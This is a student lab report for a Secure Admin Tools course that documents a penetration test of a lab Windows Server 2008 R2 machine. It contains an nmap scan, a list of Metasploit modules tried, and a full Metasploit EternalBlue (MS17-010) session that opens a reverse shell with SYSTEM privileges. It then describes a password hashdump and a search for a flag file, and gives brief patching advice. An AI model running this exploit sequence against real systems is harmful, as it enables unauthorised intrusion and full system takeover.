Try   HackMD

Secure Admin Tools – Lab Exercise 8 + 9

tags: fh SAT

© Aymeric Hollaus, Sebastian Doiber, Johannes Schwinger

Table of Contents

Procedure

To make any actions on the server we needed to connect to the fh-campus-server by using our ID. For this process we used an SSH clinet.
The first thing we did to set us up for the lab, is unsing Nmap to make a port scan. This allowed us to see every open port and the associated servies.
To find any exploits we reseached the services and the OS revealed by the nmap scan.
If we did find a possible exploit we used metasploit to check if it works.

Setup

Starting Metasplit

1810475***@secat:~$ msfconsole

Information Gathering

Port Scan

1810475041@secat:~$ nmap -A 172.16.51.112
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 12:31 UTC
Nmap scan report for 172.16.51.112
Host is up (0.00023s latency).
Not shown: 982 closed ports
PORT      STATE SERVICE            VERSION
22/tcp    open  ssh                WeOnlyDo sshd 2.4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 13:06:ce:41:ba:15:7c:c9:bc:03:6f:75:8a:77:d4:b4 (DSA)
|_  1024 0c:6b:d1:48:6e:70:f8:25:64:df:5b:df:56:c3:8a:69 (RSA)
80/tcp    open  http               Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
111/tcp   open  rpcbind            2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/tcp   nfs
|   100003  2,3         2049/tcp6  nfs
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       1048/tcp   mountd
|   100005  1,2,3       1048/tcp6  mountd
|   100005  1,2,3       1048/udp   mountd
|   100005  1,2,3       1048/udp6  mountd
|   100021  1,2,3,4     1047/tcp   nlockmgr
|   100021  1,2,3,4     1047/tcp6  nlockmgr
|   100021  1,2,3,4     1047/udp   nlockmgr
|   100021  1,2,3,4     1047/udp6  nlockmgr
|   100024  1           1039/tcp   status
|   100024  1           1039/tcp6  status
|   100024  1           1039/udp   status
|_  100024  1           1039/udp6  status
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
443/tcp   open  ssl/http           Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=WIN-4V8K6ED3C90
| Not valid before: 2020-05-25T11:00:23
|_Not valid after:  2030-05-25T00:00:00
|_ssl-date: 2020-06-16T12:33:02+00:00; -2s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp   open  microsoft-ds       Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
593/tcp   open  ncacn_http         Microsoft Windows RPC over HTTP 1.0
1039/tcp  open  status             1 (RPC #100024)
1047/tcp  open  nlockmgr           1-4 (RPC #100021)
1048/tcp  open  mountd             1-3 (RPC #100005)
2049/tcp  open  nfs                2-3 (RPC #100003)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: WIN-4V8K6ED3C90
|   NetBIOS_Domain_Name: WIN-4V8K6ED3C90
|   NetBIOS_Computer_Name: WIN-4V8K6ED3C90
|   DNS_Domain_Name: WIN-4V8K6ED3C90
|   DNS_Computer_Name: WIN-4V8K6ED3C90
|   Product_Version: 6.1.7601
|_  System_Time: 2020-06-16T12:32:57+00:00
| ssl-cert: Subject: commonName=WIN-4V8K6ED3C90
| Not valid before: 2020-05-24T11:00:21
|_Not valid after:  2020-11-23T11:00:21
|_ssl-date: 2020-06-16T12:33:02+00:00; -2s from scanner time.
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49176/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: WIN-4V8K6ED3C90; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -20m02s, deviation: 48m59s, median: -2s
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 06:ae:6b:09:76:b2 (unknown)
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: WIN-4V8K6ED3C90
|   NetBIOS computer name: WIN-4V8K6ED3C90\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-06-16T14:32:57+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-06-16T12:32:57
|_  start_date: 2020-06-12T15:15:21

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.88 seconds

Ports & Services

IP: 172.16.51.112

Ping? HOST IS UP

HOSTNAME = WIN-4V8K6ED3C90

OPEN PORTS
22 SSH
80 HTTP
111 RPCBIND
135 MSRPC
139 NETBIOS-SSN
443 SSL/HTTP
445 MICROSOFT DS > DONE! ETERNAL BLUE
593 NCACN_HTTP
1039 STATUS
1047 NLOCKMGR
1048 MOUNTD
2049 NFS
3389 SSL/MS-WBT-SERVER?
49152 MSRPC
49153 MSRPC
49154 MSRPC
49155 MSRPC
49176 MSRPC

Interpretation of gathered information

OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)

Based of the services list we informed us about potential securitiy risks.

Vulnerability Analysis

Tried modules

  • scanner/http/trace_axd
  • auxiliary/scanner/http/trace
  • windows/nfs/xlink_nfsd
  • windows/ftp/oracle9i_xdb_ftp_unlock
  • post/windows/gather/credentials/mdaemon_cred_collector
  • multi/http/tomcat_mgr_deploy
  • windows/ssh/freesshd_authbypass
  • exploit/windows/ssh/freeftpd_key_exchange
  • exploit/windows/ssh/freesshd_key_exchange
  • windows/iis/iis_webdav_upload_asp
  • scanner/http/iis_shortname_scanner
  • scanner/http/iis_internal_ip

Successes

Ethernal Blue

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                              Required  Description
   ----         ---------------                                                              --------  -----------
   CHECK_ARCH   true                                                                         no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                                         no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                                        no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       172.16.51.112                                                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                                          yes       The SMB service port (TCP)
   SMBDomain    .                                                                            no        The Windows domain to use for authentication
   SMBPass                                                                                   no        The password for the specified username
   SMBUser                                                                                   no        The username to authenticate as
   THREADS      1                                                                            yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 172.16.51.112:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.51.112:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > back
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.51.112
rhosts => 172.16.51.112
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         172.16.51.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[-] Handler failed to bind to 172.16.51.103:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] 172.16.51.112:445 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) > ipconfig
^CInterrupt: use the 'exit' command to quit
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhosts 172.16.51.103
lhosts => 172.16.51.103
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 172.16.51.103:4444
[*] 172.16.51.112:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.51.112:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.51.112:445     - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.51.112:445 - Connecting to target for exploitation.
[+] 172.16.51.112:445 - Connection established for exploitation.
[+] 172.16.51.112:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.51.112:445 - CORE raw buffer dump (51 bytes)
[*] 172.16.51.112:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 172.16.51.112:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 172.16.51.112:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 172.16.51.112:445 - 0x00000030  6b 20 31                                         k 1
[+] 172.16.51.112:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.51.112:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.51.112:445 - Sending all but last fragment of exploit packet
[*] 172.16.51.112:445 - Starting non-paged pool grooming
[+] 172.16.51.112:445 - Sending SMBv2 buffers
[+] 172.16.51.112:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.51.112:445 - Sending final SMBv2 buffers.
[*] 172.16.51.112:445 - Sending last fragment of exploit packet!
[*] 172.16.51.112:445 - Receiving response from exploit packet
[+] 172.16.51.112:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.51.112:445 - Sending egg to corrupted connection.
[*] 172.16.51.112:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (172.16.51.103:4444 -> 172.16.51.112:49276) at 2020-06-16 14:28:14 +0000
[+] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



C:\Windows\system32>sysinfo
sysinfo
'sysinfo' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>getuid
getuid
'getuid' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>sysinfo
sysinfo
'sysinfo' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>exit
exit


^C
Abort session 1? [y/N]  y
""

[*] 172.16.51.112 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 172.16.51.103:4444
[*] 172.16.51.112:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.51.112:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.51.112:445     - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.51.112:445 - Connecting to target for exploitation.
[+] 172.16.51.112:445 - Connection established for exploitation.
[+] 172.16.51.112:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.51.112:445 - CORE raw buffer dump (51 bytes)
[*] 172.16.51.112:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 172.16.51.112:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 172.16.51.112:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 172.16.51.112:445 - 0x00000030  6b 20 31                                         k 1
[+] 172.16.51.112:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.51.112:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.51.112:445 - Sending all but last fragment of exploit packet
[*] 172.16.51.112:445 - Starting non-paged pool grooming
[+] 172.16.51.112:445 - Sending SMBv2 buffers
[+] 172.16.51.112:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.51.112:445 - Sending final SMBv2 buffers.
[*] 172.16.51.112:445 - Sending last fragment of exploit packet!
[*] 172.16.51.112:445 - Receiving response from exploit packet
[+] 172.16.51.112:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.51.112:445 - Sending egg to corrupted connection.
[*] 172.16.51.112:445 - Triggering free of corrupted buffer.
[-] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 172.16.51.112:445 - Connecting to target for exploitation.
[+] 172.16.51.112:445 - Connection established for exploitation.
[+] 172.16.51.112:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.51.112:445 - CORE raw buffer dump (51 bytes)
[*] 172.16.51.112:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 172.16.51.112:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 172.16.51.112:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 172.16.51.112:445 - 0x00000030  6b 20 31                                         k 1
[+] 172.16.51.112:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.51.112:445 - Trying exploit with 17 Groom Allocations.
[*] 172.16.51.112:445 - Sending all but last fragment of exploit packet
[*] 172.16.51.112:445 - Starting non-paged pool grooming
[+] 172.16.51.112:445 - Sending SMBv2 buffers
[+] 172.16.51.112:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.51.112:445 - Sending final SMBv2 buffers.
[*] 172.16.51.112:445 - Sending last fragment of exploit packet!
[*] 172.16.51.112:445 - Receiving response from exploit packet
[+] 172.16.51.112:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.51.112:445 - Sending egg to corrupted connection.
[*] 172.16.51.112:445 - Triggering free of corrupted buffer.
[*] Command shell session 2 opened (172.16.51.103:4444 -> 172.16.51.112:49277) at 2020-06-16 14:33:27 +0000
[+] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.51.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>hostname
hostname
WIN-4V8K6ED3C90

C:\Windows\system32>

What does this exploit allow us to do?

This exploit gives the attacker full access to the system-command-line.

How to prevent the attack?

Make sure your system installed the lates software updates.
For more information on how easily fix the problem, we provieded a link for you.

If, for some reason, it is not possible, other mitigations include disabling SMBv1 and not exposing any vulnerable machines to internet access.

Hashdump cracking


We tried to extract the password for "guest" out of a hashdump witch woked, revealing that the "guest"-user had no password. But the same method did not work on the "admin"-user (probably because it was salted).

flag.txt

C:\>dir /b/s *.txt
dir /b/s *.txt
C:\ProcessList.txt
C:\Program Files\Windows NT\TableTextService\TableTextServiceAmharic.txt
C:\Program Files\Windows NT\TableTextService\TableTextServiceArray.txt
C:\Program Files\Windows NT\TableTextService\TableTextServiceDaYi.txt
[...]
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\administrator@www.bing[1].txt
C:\Users\Administrator\Desktop\flag.txt
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppCrash_lsass.exe_eb79913b47a1b9451432438d2992459520a1762_cab_051410a1\WERFE6.tmp.appcompat.txt
[...]
C:\Windows\winsxs\x86_microsoft-windows-t..textservice-amharic_31bf3856ad364e35_6.1.7600.16385_none_6583d3f29e43cfa1\TableTextServiceAmharic.txt
C:\Windows\winsxs\x86_microsoft-windows-t..tional-chinese-dayi_31bf3856ad364e35_6.1.7600.16385_none_6052679946eea92d\TableTextServiceDaYi.txt

Last changed by 
FH-Coop
0
508

Read more

Virtual Worlds Questions

[TOC] Link to HACKMD file https://hackmd.io/@FH-SDJS/VR-AR-ExamQuestions Which are three ways of modeling 3D objects in VR? By Hand i.e. CAD Drawings | hand modeled: via appropriate tools like CAD software. This process CAN be supported by motion capture technology. Procedural Modelling | proceduraly generated: requires some data to work off but is a very time saving technique for things that populate the background 3D Scans of Real Objects: using depth-cameras, and volumetric methods or computertomography. This requires some additional steps:

Nov 24, 2020
QoL-Learning Diary

Team: Sebastian Doiber, Johannes Schwiner Important links: Our trello-board 18.06. First Sprint Was war bisher Im ersten Sprint haben wir einen Nav-Graph entworfen um eine Grundstruktur festzulegen und einen &quot;Angangspunkt&quot; zu haben. Dazu haben wir uns eine basic design Idee &#xFC;berlegt und versuchen uns an die zu halten (material.io). Zus&#xE4;tzlich wurde eine Klasse f&#xFC;r die Zustandsprofile erstellt.

Sep 1, 2020
IoT Lab_4

Group members: Sebastian Doiber, Johannes Schwinger This lab exercise&#x2019;s topic is LoRaWAN. We will use the LoRa Boards provided by the IoT-LAB: ST B-L072Z-LRWAN1 boards with ST MEMS extension X-NUCLEO-IKS01A2. We will set up a LoRaWAN application which sends data o a network server; finally, we will connect our app to an application server (for a graphical presentation of our data. We will use the same setup as we did for lab exercises 1 &amp; 2: Ubuntu 18.04. (VM) with RIOT-OS and the IoT-Lab. Documents your work with screenshots and thorough expalanation where applicable. First steps with TTN :::info

Jul 7, 2020
SAT Lab7

For the http (pretty) Version, visit: https://hackmd.io/@FH-SDJS/SAT_Lab7 Name: Sebastian Doiber, Johannes Schwinger :::warning Note: We originally planned on submitting 2 seperate protocols but since especially at the last point our answers merged together we decided to submit the same protocol. Thats why the first few points have answers labeled &quot;Sebastian&quot; and &quot;Johannes&quot;. ::: Angabe NMAP All the tasks have to be performed while being logged in to its.fh-campuswien.ac.at using your SSH credentials from the Scapy lab-exercise.

May 23, 2020
Read more from FH-Coop
Published on HackMD